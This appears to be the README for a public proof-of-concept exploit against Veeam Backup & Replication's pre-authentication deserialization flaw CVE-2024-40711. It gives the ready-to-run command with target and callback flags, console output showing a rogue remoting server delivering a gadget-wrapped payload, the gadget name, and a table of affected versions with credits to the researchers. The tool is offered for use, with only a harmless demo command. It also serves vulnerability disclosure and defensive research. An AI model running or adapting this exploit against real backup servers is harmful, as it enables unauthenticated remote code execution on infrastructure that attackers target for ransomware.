Exploit for Veeam backup and Replication Pre-Auth Deserialization CVE-2024-40711
See our blog post for technical details
demo.mp4
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
This vulnerability was found by Florian Hauser (@frycos) of CODE WHITE GmbH (@codewhitesec). Make sure to follow his outstanding research, our role was to only recreate and develop the exploit for this issue.
| Version | Status |
|---|---|
| 12.2.0.334 | Fully patched. Not affected by the vulnerabilities in this blogpost. |
| 12.1.2.172 | Affected, but exploitation requires authentication. Low privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE. |
This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
We'd also like to take the opportunity to thank Soroush Dalili for his help with this exploit.
Follow watchTowr Labs
For the latest security research follow the watchTowr Labs Team